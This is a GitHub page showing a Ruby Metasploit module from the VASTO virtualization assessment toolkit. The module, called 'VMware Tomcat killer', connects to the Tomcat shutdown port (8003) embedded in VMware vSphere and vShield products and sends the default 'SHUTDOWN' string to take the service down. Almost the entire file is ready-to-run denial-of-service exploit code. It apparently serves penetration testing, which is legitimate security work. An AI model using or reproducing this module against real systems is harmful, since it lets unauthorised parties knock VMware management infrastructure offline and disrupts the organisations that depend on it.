-
Notifications
You must be signed in to change notification settings - Fork 3
/
vmware_tomcat_killer.rb
61 lines (54 loc) · 1.41 KB
/
vmware_tomcat_killer.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#################################################################
# #
# This module is part of VASTO #
# Version 0.4 #
# Virtualization ASsessment TOolkit #
# #
#################################################################
require 'msf/core'
class Metasploit3 < Msf::Exploit::Local
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'VMware Tomcat killer',
'Description' => %q{
This module abuses the Tomcat server embedded in most VMware products, including Virtual Server vSphere 4.1-4.0 and vShield
which is left with an unchanged shutdown value by default.
},
'Author' => [ 'Claudio Criscione' ],
'License' => GPL_LICENSE,
'Version' => 'VMware Tomcat Killer 0.1',
'Targets' =>
[
#Vcenter runs on Windows
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 28 2010'))
register_options(
[
Opt::RPORT(8003),
Opt::RHOST('127.0.0.1')
], self.class)
end
def exploit
begin
port = datastore['PORT']
print_status("Connecting")
connect
print_status("Connected, sending shutdown")
#Sending shutdown
sock.put(
"SHUTDOWN\n"
)
print_status("Shutdown sent. Server should be down")
disconnect
rescue
end
end
end